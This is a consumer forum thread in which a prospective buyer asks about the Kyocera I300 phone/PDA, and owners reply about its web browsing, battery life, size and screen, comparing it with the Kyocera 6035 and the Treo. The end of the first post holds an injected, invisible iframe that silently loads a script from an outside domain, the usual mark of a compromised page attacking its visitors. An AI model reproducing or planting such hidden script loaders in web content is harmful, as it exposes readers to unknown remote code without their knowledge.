I've read several posts on this discussion board and all of you have been resourceful. I am impressed with the I300's features but I want to know is it worth my $500?
It says that I can browse the web with very few limitations in html, is this true?
I want to be able to view my yahoo e-mail, is that possible?
I was able to do it with the Samsung 3500 and of course the web browsing with that model was text only. The main reason for going in the I300 direction is that I really don't want to walk around with both a cell phone and a PDA.
Since all of you obviously own one, could you list the pay-offs and some of the drawbacks?
More empahsis on your I300 online experience would be appreciated.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The I300 comes pretty close to granting full access to the web. I encourage you to run a search on, perhaps, "should", "buy", and "review." Further, the "first impressions" thread in the polls forum was designated specifically for this purpose. Good luck friend. You won't regret the I300.
First of all, I bought mine with the understanding that it would only be for text based browsing. I used to carry a Palm IIIxe and a startac. I finally decided that the ability to carry a phone and color Palm in one unit would work great for me. So I got it anyway.
Well I've had it for a few weeks now and what have I found??? It has greatly exceeded my expectations. I actually get tiny (but very useable) graphics on several of the sites that I visit. The load times are slow but it's quicker than driving home to get on my computer there.
I now have the ability to get on Ebay, forums, homepages etc., etc, etc, and look for things/prices real time. Meaning while I'm still in the store and trying to figure out how much something is worth. Looking up stuff on Internet Movie DataBase (IMDB) is also great.
There is no doubt in my mind that some new phone that supports the 3G network will blow this ones performance away but that is still a year or two away (depending one location) and I've got a whole lotta surfin to do between now and then.
If you need a PDA and a phone and remote access to the web then get it. If you just want a new toy then go get an MP3 player or something. But as far as the category of what the i300 is, it is truly the bee's knees. (Hey, did I really say that? Who do I think I am now,,, mjornage???)

So in that case, is the I300 worth $300? Absolutely! The advantages are pretty obvious so I won't go into those. However, some of the drawbacks some might feel are size (a little big compared to some of the newer cell phones but definitely less to carry around when compared to a phone and pda), battery life (its not that bad IMO and you get an extra battery...I usually get 2-3 days), lack of a hard keypad (get use to it after a while), and a so-so color screen (not that bad IMO). I consider these minor drawbacks a very small price to pay for the convenience and simplicity this device brings me. The I300 does a lot more things right than wrong and if you do decide to purchase one, you will be very happy with your purchase. However, if you don't need a color screen, you can get the Kyocera 6035 dirt cheap right now and the Treo is expected to be launched in the US within weeks so those are other options as well.
if you need someone to sell you on the i300 then you dont need it..
the i300 is a fabulous unit, and so is the jyocera 6035.. the difference bewteen the two is that the 6035 is not color and battery life is much better. they are both gems and if you dont want to spend400 bucks or so upfront, you can get the 6035 for 150 or so...
just browse this board if you have any questions as they have been asked already by oflks just like yourself...
